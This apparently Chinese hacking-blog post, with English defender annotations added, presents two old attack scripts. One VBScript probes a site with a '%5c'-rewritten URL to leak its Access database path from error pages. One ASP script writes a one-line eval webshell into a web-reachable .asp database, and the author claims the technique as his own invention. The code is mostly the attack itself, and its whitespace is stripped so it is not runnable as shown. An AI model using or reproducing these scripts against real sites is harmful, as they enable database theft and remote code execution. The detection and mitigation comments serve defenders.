N年前的两个脚本%5c暴库
摘要:DimxStatus,tStatus,vServer,vHeader,vRsBodyGetError=InputBox("请输入网站,例如:...

' Purpose: prompts for a URL, rewrites the last "/" in it to "%5c" (a
' URL-encoded backslash), requests the rewritten URL, and shows either the
' database path found in the server's error page or the raw response body.
' NOTE(review): this listing lost its whitespace during extraction (for
' example "Dim" and "xStatus" are fused), so it is not runnable as shown.
' Defender notes:
'   - Detection: web server logs show a request whose final path separator
'     is "%5c" instead of "/", sent with the POST method and no body.
'   - Mitigation: the script only yields a path when the error page echoes
'     one, so turn off detailed script/database errors for remote clients,
'     handle connection-open failures in the application, and keep the
'     database file outside the web root.
'   - The response body is later passed to OpenWin, which builds a statement
'     with Execute; treat this script as unsafe to run against any server
'     you do not control.

' Script-level variables that xmlPost fills in.
DimxStatus,tStatus,vServer,vHeader,vRsBody

' Ask the operator for the target URL; the same example URL is the default.
GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")

' Empty input (or Cancel): show an "input error" message and stop.
IfGetError=""Then

MsgBox("输入错误,程序结束!")

WScript.Quit

EndIf

' Reverse the URL so that the LAST "/" becomes the first one the loop meets.
GetError=StrReverse(GetError)

' Tem2 counts replacements so that only one "/" is rewritten.
Tem2=0

ForI=1ToLen(GetError)

' Chr(47) is "/"; "c5%" is "%5c" written backwards because the string is reversed.
IfMid(GetError,I,1)=Chr(47)AndTem2=0Then

Temp=Temp&"c5%"

Tem2=Tem2+1

Else

Temp=Temp&Mid(GetError,I,1)

EndIf

Next

' Reverse back: the URL now has "%5c" where its last "/" was.
GetError=StrReverse(Temp)

' Send the request; results land in xStatus, vServer, vRsBody, etc.
CallxmlPost(GetError)

' Header line for the result window: Server header followed by the HTTP status.
ErrorText=vServer&""&xStatus

' Try three error-message patterns in turn. The literals are Chinese-locale
' error texts: "Could not find file '...'", "'...' is not a valid path",
' and "open registry key '...'". GetStr returns "[None]" when no match.
' NOTE(review): presumably these are Jet/ADO provider errors - confirm.
BaseSaver=GetStr(vRsBody,"找不到文件'","'。</font>"&Chr(10))

IfBaseSaver="[None]"Then

BaseSaver=GetStr(vRsBody,"<fontface="&Chr(34)&"宋体"&Chr(34)&"size=2>'","'不是一个有效的路径。")

EndIf

IfBaseSaver="[None]"Then

BaseSaver=GetStr(vRsBody,"打开注册表关键字'","'。</font>")

EndIf

' No pattern matched: show the whole response body. Otherwise show only the
' extracted path. Either way the remote text is embedded unescaped in HTML.
IfBaseSaver="[None]"Then

AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'style='border:0pt;margin-left:5pt'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&vRsBody&"</textarea>"

Else

AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'style='border:0pt;margin-left:5pt'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&BaseSaver&"</textarea>"

EndIf

' Render the result in an Internet Explorer window.
CallOpenWin(AllReturn)

' Bring the result window to the foreground by its title.
SetWHShell=WScript.CreateObject("WScript.Shell")

WHShell.AppActivate"Mappath出错获取数据库地址Lilo"

'WHShell.SendKeys("%{TAB}")

SetWHShell=Nothing

' URLEncoding(vstrIn): returns vstrIn with every character whose Asc()
' magnitude is &HFF or more replaced by "%HH%LL" (high byte, low byte).
' Characters below that threshold are copied through unchanged, so reserved
' ASCII characters such as "&" or "%" are NOT escaped by this routine.
' NOTE(review): whitespace was lost in extraction; the line computing Hight8
' also looks like it lost an operator between ")" and "&HFF" - confirm
' against an intact copy before relying on this listing.
FunctionURLEncoding(vstrIn)

strReturn=""

Fori=1ToLen(vstrIn)

ThisChr=Mid(vStrIn,i,1)

' Pass single-byte characters through as they are.
IfAbs(Asc(ThisChr))<&HFFThen

strReturn=strReturn&ThisChr

Else

innerCode=Asc(ThisChr)

' Asc() can return a negative value here; map it into 0..&HFFFF.
IfinnerCode<0Then

innerCode=innerCode+&H10000

EndIf

' Split the 16-bit code into its high and low bytes.
Hight8=(innerCodeAnd&HFF00)&HFF

Low8=innerCodeAnd&HFF

' NOTE(review): Hex() does not zero-pad, so a byte below &H10 would be
' emitted as a single hex digit.
strReturn=strReturn&"%"&Hex(Hight8)&"%"&Hex(Low8)

EndIf

Next

URLEncoding=strReturn

EndFunction

' bytes2BSTR(vIn): converts a byte string (here the raw HTTP response body)
' into a VBScript string. Bytes below &H80 become one character each; any
' other byte is combined with the byte after it into one two-byte code.
' NOTE(review): presumably targets a double-byte code page such as GBK -
' confirm. A response in another encoding (for example UTF-8) would be
' decoded incorrectly.
Functionbytes2BSTR(vIn)

strReturn=""

Fori=1ToLenB(vIn)

ThisCharCode=AscB(MidB(vIn,i,1))

' Single-byte (ASCII range) character.
IfThisCharCode<&H80Then

strReturn=strReturn&Chr(ThisCharCode)

Else

' Lead byte: read the following byte and build the 16-bit code.
' NOTE(review): no bounds check if the lead byte is the last byte.
NextCharCode=AscB(MidB(vIn,i+1,1))

strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))

' Skip the trail byte that was just consumed.
i=i+1

EndIf

Next

bytes2BSTR=strReturn

EndFunction

' xmlPost(iURL): sends a synchronous HTTP POST with no body to iURL and
' stores the outcome in the script-level variables xStatus, tStatus,
' vServer, vHeader and vRsBody. The function itself returns nothing.
' Defender note: in server logs this appears as a POST with no request
' body, issued through the Microsoft.XMLHTTP COM object.
FunctionxmlPost(iURL)

' Errors (unreachable host, missing header, ...) are silently ignored, so
' the output variables may be left empty or stale.
OnErrorResumeNext

' NOTE(review): iPost is not a parameter and is never sent; this line has
' no visible effect on the request.
iPost=URLEncoding(iPost)

SetxPost=CreateObject("Microsoft.XMLHTTP")

' Third argument False = synchronous: Send blocks until the response arrives.
xPost.open"POST",iURL,False

xPost.Send

xStatus=xPost.Status

tStatus=xPost.StatusText

vServer=xPost.GetResponseHeader("Server")

vHeader=xPost.GetAllResponseHeaders

' Decode the raw body bytes into a string for pattern matching.
vRsBody=bytes2BSTR(xPost.responseBody)

SetxPost=Nothing

EndFunction

' GetStr(vString,iString,dString): returns the text found between the first
' occurrence of iString and the next occurrence of dString, or the literal
' "[None]" when either marker is missing.
' NOTE(review): the vString parameter is ignored; the search always runs
' on the script-level vRsBody.
FunctionGetStr(vString,iString,dString)

' Position of the opening marker (0 = not found).
vSum=inStr(vRsBody,iString)

IfvSum=0ThenGetStr="[None]":ExitFunction

' Position of the closing marker, searched from the opening marker onward.
eSum=inStr(vSum,vRsBody,dString)

IfeSum=0ThenGetStr="[None]":ExitFunction

' Slice out what lies strictly between the two markers.
GetStr=Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))

EndFunction

' IntToStr(vNum,vLen): left-pads vNum with "0" characters until it is vLen
' characters long; values already that long or longer are returned as is.
' Not called anywhere in the visible script.
FunctionIntToStr(vNum,vLen)

' Already wide enough: return the value unchanged.
IfLen(vNum)>=vLenThenIntToStr=vNum:ExitFunction

' Emit one "0" per missing character.
ForI=1TovLen-Len(vNum)

IntToStr=IntToStr&"0"

Next

IntToStr=IntToStr&CStr(vNum)

EndFunction

' GetSplit(unStr,vaStr,Mode): splits unStr on the delimiter vaStr and
' returns a result that depends on Mode:
'   Mode = -1       the whole array
'   Mode = -2       the upper bound of the array
'   Mode >= 0       the element at index Mode, or False if out of range
' Any other negative Mode returns nothing (Empty).
' Not called anywhere in the visible script.
FunctionGetSplit(unStr,vaStr,Mode)

aTemp=Split(unStr,vaStr)

bTemp=Ubound(aTemp)

SelectCaseMode

Case-1:GetSplit=aTemp

Case-2:GetSplit=bTemp

EndSelect

' Negative modes were fully handled by the Select above.
IfMode<0ThenExitFunction

' Index past the end of the array.
IfMode>bTempThenGetSplit=False:ExitFunction

IfMode>=0ThenGetSplit=aTemp(Mode)

EndFunction

' OpenWin(vTTv): opens a small Internet Explorer window on about:blank and
' writes the HTML in vTTv into it.
' NOTE(review): vTTv is concatenated into a statement that is run with
' Execute. In this script vTTv contains text taken from a remote server's
' response, so a double quote in that response ends the string literal and
' the remainder is interpreted as VBScript on the local machine. Assigning
' the markup through the document object directly, without Execute, would
' avoid evaluating remote data as code. Analysts should only run this in an
' isolated lab environment.
FunctionOpenWin(vTTv)

SetIE=WScript.CreateObject("InternetExplorer.Application")

IE.Navigate"about:blank"

' Window chrome: visible, no toolbar or status bar, fixed 500x335 size.
IE.Visible=1

IE.ToolBar=0

IE.StatusBar=0

IE.Width=500

IE.Height=335

' Busy-wait until the blank page has finished loading.
DoWhile(IE.Busy):Loop

SetDoc=IE.Document

Doc.Open

' Builds the source text  Doc.Writeln"<vTTv>"  and executes it.
Execute"Doc.Writeln"&Chr(34)&vTTv&Chr(34)

Doc.Close

SetIE=Nothing

EndFunction

另一个脚本是我写的:向 Access 数据库里插入 ASP 代码来当作后门。这应当是我的首创了,不过我也不知道其他人有没有更早发现。后来网上就流传开直接向数据库插入“一句话”来得到 webshell 的做法。这种做法之所以成立,是因为数据库文件放在网站目录内,并且使用了会被服务器当作脚本解析的扩展名(如下面示例中的 .asp);把数据库放到网站目录之外,就不会被当作脚本执行。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

' Purpose: opens an Access (Jet) database that sits under the web root with
' an .asp file name, creates a table "notdownload" with one OLE-object
' column "notdown", and appends a byte sequence to a new row. The bytes
' spell a server-side script tag whose body evaluates a POST form field,
' i.e. a one-line webshell stored inside the database file.
' NOTE(review): whitespace was lost in extraction, so this listing is not
' runnable as shown.
' Defender notes:
'   - Detection: scan database files and script-mapped files under the web
'     root for the byte patterns "runat=server" together with
'     "eval(request"; alert on POST requests whose URL is a database file.
'   - Mitigation: keep the database outside the web root, do not give it a
'     script-mapped extension, and do not let the web application account
'     create tables in it.
'   - The table name suggests the "anti-download" habit of renaming the
'     database to .asp and adding a table containing "<%"; presumably this
'     is the behaviour being abused - confirm.

db="0123.asp"'change this to your database path

setconn=server.createobject("Adodb.Connection")

' Server.MapPath resolves db relative to the site, so the file is web-reachable.
connstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath(db)

conn.openconnstr

'add the notdownload table

conn.execute("createtablenotdownload(notdownoleobject)")

'write the <% data

setrs=server.createobject("adodb.recordset")

sql="select*fromnotdownload"

' 1,3 = cursor type and lock type arguments that allow adding a row.
rs.opensql,conn,1,3

rs.addnew

' The payload is assembled one byte at a time with chrB(asc(..)) and
' appended as binary data to the OLE-object column.
rs("notdown").appendchunk(chrB(asc("<"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(""))&chrB(asc("r"))&chrB(asc("u"))&chrB(asc("n"))&chrB(asc("a"))&chrB(asc("t"))&chrB(asc("="))&chrB(asc("s"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc("v"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc(""))&chrB(asc("l"))&chrB(asc("a"))&chrB(asc("n"))&chrB(asc("g"))&chrB(asc("u"))&chrB(asc("a"))&chrB(asc("g"))&chrB(asc("e"))&chrB(asc("="))&chrB(asc("j"))&chrB(asc("a"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))&chrB(asc("e"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("l"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("."))&chrB(asc("f"))&chrB(asc("o"))&chrB(asc("r"))&chrB(asc("m"))&chrB(asc("("))&chrB(asc("'"))&chrB(asc("#"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("+"))&chrB(asc("'"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("<"))&chrB(asc("/"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">")))

rs.update

rs.close

setrs=nothing

'close the connection

conn.close

setconn=nothing

%>
